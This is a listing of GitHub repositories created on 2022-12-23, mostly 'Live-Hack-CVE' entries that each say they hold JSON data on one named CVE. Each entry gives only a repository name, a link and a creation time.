**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36962 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36962](https://github.com/Live-Hack-CVE/CVE-2022-36962) create time: 2022-12-23T12:15:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36433 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36433](https://github.com/Live-Hack-CVE/CVE-2022-36433) create time: 2022-12-23T12:15:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4036 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4036](https://github.com/Live-Hack-CVE/CVE-2022-4036) create time: 2022-12-23T12:15:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46150 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46150](https://github.com/Live-Hack-CVE/CVE-2022-46150) create time: 2022-12-23T12:15:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46148 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46148](https://github.com/Live-Hack-CVE/CVE-2022-46148) create time: 2022-12-23T12:15:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4034 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4034](https://github.com/Live-Hack-CVE/CVE-2022-4034) create time: 2022-12-23T12:15:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4035 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4035](https://github.com/Live-Hack-CVE/CVE-2022-4035) create time: 2022-12-23T12:15:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4033 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4033](https://github.com/Live-Hack-CVE/CVE-2022-4033) create time: 2022-12-23T12:15:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4032 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4032](https://github.com/Live-Hack-CVE/CVE-2022-4032) create time: 2022-12-23T12:14:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44283 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44283](https://github.com/Live-Hack-CVE/CVE-2022-44283) create time: 2022-12-23T12:14:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44284 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44284](https://github.com/Live-Hack-CVE/CVE-2022-44284) create time: 2022-12-23T12:14:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44399 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44399](https://github.com/Live-Hack-CVE/CVE-2022-44399) create time: 2022-12-23T12:14:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35896 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35896](https://github.com/Live-Hack-CVE/CVE-2020-35896) create time: 2022-12-23T10:20:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20315 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20315](https://github.com/Live-Hack-CVE/CVE-2021-20315) create time: 2022-12-23T10:20:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3948 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3948](https://github.com/Live-Hack-CVE/CVE-2021-3948) create time: 2022-12-23T10:20:14Z

**no description** : [Nidhi77777/linux-4.19.72_CVE-2022-29581](https://github.com/Nidhi77777/linux-4.19.72_CVE-2022-29581) create time: 2022-12-23T10:41:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39250 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39250](https://github.com/Live-Hack-CVE/CVE-2022-39250) create time: 2022-12-23T10:20:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39251 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39251](https://github.com/Live-Hack-CVE/CVE-2022-39251) create time: 2022-12-23T10:20:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42968 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42968](https://github.com/Live-Hack-CVE/CVE-2022-42968) create time: 2022-12-23T10:20:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42227 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42227](https://github.com/Live-Hack-CVE/CVE-2022-42227) create time: 2022-12-23T10:20:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43229 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43229](https://github.com/Live-Hack-CVE/CVE-2022-43229) create time: 2022-12-23T10:20:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42311 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42311](https://github.com/Live-Hack-CVE/CVE-2022-42311) create time: 2022-12-23T10:20:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3201 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3201](https://github.com/Live-Hack-CVE/CVE-2022-3201) create time: 2022-12-23T10:20:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1664 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1664](https://github.com/Live-Hack-CVE/CVE-2022-1664) create time: 2022-12-23T10:20:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-4235 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-4235](https://github.com/Live-Hack-CVE/CVE-2013-4235) create time: 2022-12-23T10:07:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3853 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3853](https://github.com/Live-Hack-CVE/CVE-2018-3853) create time: 2022-12-23T10:05:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3854 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3854](https://github.com/Live-Hack-CVE/CVE-2018-3854) create time: 2022-12-23T10:05:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3852 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3852](https://github.com/Live-Hack-CVE/CVE-2018-3852) create time: 2022-12-23T10:05:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-3856 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-3856](https://github.com/Live-Hack-CVE/CVE-2018-3856) create time: 2022-12-23T10:05:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-16472 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-16472](https://github.com/Live-Hack-CVE/CVE-2018-16472) create time: 2022-12-23T09:50:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-11490 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-11490](https://github.com/Live-Hack-CVE/CVE-2018-11490) create time: 2022-12-23T09:49:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18897](https://github.com/Live-Hack-CVE/CVE-2019-18897) create time: 2022-12-23T10:19:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19221 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19221](https://github.com/Live-Hack-CVE/CVE-2019-19221) create time: 2022-12-23T10:05:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4158 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4158](https://github.com/Live-Hack-CVE/CVE-2019-4158) create time: 2022-12-23T10:05:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4224 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4224](https://github.com/Live-Hack-CVE/CVE-2019-4224) create time: 2022-12-23T10:04:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4038 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4038](https://github.com/Live-Hack-CVE/CVE-2019-4038) create time: 2022-12-23T10:04:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4008 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4008](https://github.com/Live-Hack-CVE/CVE-2019-4008) create time: 2022-12-23T10:04:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4027 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4027](https://github.com/Live-Hack-CVE/CVE-2019-4027) create time: 2022-12-23T10:04:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4043 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4043](https://github.com/Live-Hack-CVE/CVE-2019-4043) create time: 2022-12-23T10:04:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4046 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4046](https://github.com/Live-Hack-CVE/CVE-2019-4046) create time: 2022-12-23T10:04:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3906 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3906](https://github.com/Live-Hack-CVE/CVE-2019-3906) create time: 2022-12-23T10:04:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4040 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4040](https://github.com/Live-Hack-CVE/CVE-2019-4040) create time: 2022-12-23T10:03:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3912 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3912](https://github.com/Live-Hack-CVE/CVE-2019-3912) create time: 2022-12-23T10:03:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3908 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3908](https://github.com/Live-Hack-CVE/CVE-2019-3908) create time: 2022-12-23T10:03:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3911 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3911](https://github.com/Live-Hack-CVE/CVE-2019-3911) create time: 2022-12-23T10:03:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4011 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4011](https://github.com/Live-Hack-CVE/CVE-2019-4011) create time: 2022-12-23T09:51:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4012 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4012](https://github.com/Live-Hack-CVE/CVE-2019-4012) create time: 2022-12-23T09:51:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4014 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4014](https://github.com/Live-Hack-CVE/CVE-2019-4014) create time: 2022-12-23T09:51:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4016 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4016](https://github.com/Live-Hack-CVE/CVE-2019-4016) create time: 2022-12-23T09:51:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4015 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4015](https://github.com/Live-Hack-CVE/CVE-2019-4015) create time: 2022-12-23T09:51:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4033 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4033](https://github.com/Live-Hack-CVE/CVE-2019-4033) create time: 2022-12-23T09:51:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4030 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4030](https://github.com/Live-Hack-CVE/CVE-2019-4030) create time: 2022-12-23T09:51:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3920 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3920](https://github.com/Live-Hack-CVE/CVE-2019-3920) create time: 2022-12-23T09:51:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4032 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4032](https://github.com/Live-Hack-CVE/CVE-2019-4032) create time: 2022-12-23T09:51:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4028 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4028](https://github.com/Live-Hack-CVE/CVE-2019-4028) create time: 2022-12-23T09:51:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4039 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4039](https://github.com/Live-Hack-CVE/CVE-2019-4039) create time: 2022-12-23T09:51:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3919 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3919](https://github.com/Live-Hack-CVE/CVE-2019-3919) create time: 2022-12-23T09:50:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3918 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3918](https://github.com/Live-Hack-CVE/CVE-2019-3918) create time: 2022-12-23T09:50:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4029 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4029](https://github.com/Live-Hack-CVE/CVE-2019-4029) create time: 2022-12-23T09:50:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4439 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4439](https://github.com/Live-Hack-CVE/CVE-2019-4439) create time: 2022-12-23T09:50:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-4430 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-4430](https://github.com/Live-Hack-CVE/CVE-2019-4430) create time: 2022-12-23T09:50:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10737 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10737](https://github.com/Live-Hack-CVE/CVE-2020-10737) create time: 2022-12-23T10:19:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14155 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14155](https://github.com/Live-Hack-CVE/CVE-2020-14155) create time: 2022-12-23T10:07:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15586 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15586](https://github.com/Live-Hack-CVE/CVE-2020-15586) create time: 2022-12-23T10:04:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15852 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15852](https://github.com/Live-Hack-CVE/CVE-2020-15852) create time: 2022-12-23T10:04:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-3481 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-3481](https://github.com/Live-Hack-CVE/CVE-2020-3481) create time: 2022-12-23T10:04:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15901 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15901](https://github.com/Live-Hack-CVE/CVE-2020-15901) create time: 2022-12-23T10:04:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13946 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13946](https://github.com/Live-Hack-CVE/CVE-2020-13946) create time: 2022-12-23T10:03:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-5913 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-5913](https://github.com/Live-Hack-CVE/CVE-2020-5913) create time: 2022-12-23T10:03:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7712 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7712](https://github.com/Live-Hack-CVE/CVE-2020-7712) create time: 2022-12-23T10:03:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23835 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23835](https://github.com/Live-Hack-CVE/CVE-2020-23835) create time: 2022-12-23T10:03:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23839 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23839](https://github.com/Live-Hack-CVE/CVE-2020-23839) create time: 2022-12-23T10:03:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25042 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25042](https://github.com/Live-Hack-CVE/CVE-2020-25042) create time: 2022-12-23T10:03:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-16602 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-16602](https://github.com/Live-Hack-CVE/CVE-2020-16602) create time: 2022-12-23T10:03:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-17507 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-17507](https://github.com/Live-Hack-CVE/CVE-2020-17507) create time: 2022-12-23T09:50:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15861 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15861](https://github.com/Live-Hack-CVE/CVE-2020-15861) create time: 2022-12-23T09:50:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8287 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8287](https://github.com/Live-Hack-CVE/CVE-2020-8287) create time: 2022-12-23T09:49:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42387 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42387](https://github.com/Live-Hack-CVE/CVE-2021-42387) create time: 2022-12-23T10:18:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37823 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37823](https://github.com/Live-Hack-CVE/CVE-2021-37823) create time: 2022-12-23T10:07:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-31566 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-31566](https://github.com/Live-Hack-CVE/CVE-2021-31566) create time: 2022-12-23T10:05:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-23177 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-23177](https://github.com/Live-Hack-CVE/CVE-2021-23177) create time: 2022-12-23T10:05:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-29421 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-29421](https://github.com/Live-Hack-CVE/CVE-2021-29421) create time: 2022-12-23T10:05:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38578 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38578](https://github.com/Live-Hack-CVE/CVE-2021-38578) create time: 2022-12-23T10:05:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26727 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26727](https://github.com/Live-Hack-CVE/CVE-2021-26727) create time: 2022-12-23T09:52:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26729 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26729](https://github.com/Live-Hack-CVE/CVE-2021-26729) create time: 2022-12-23T09:52:15Z

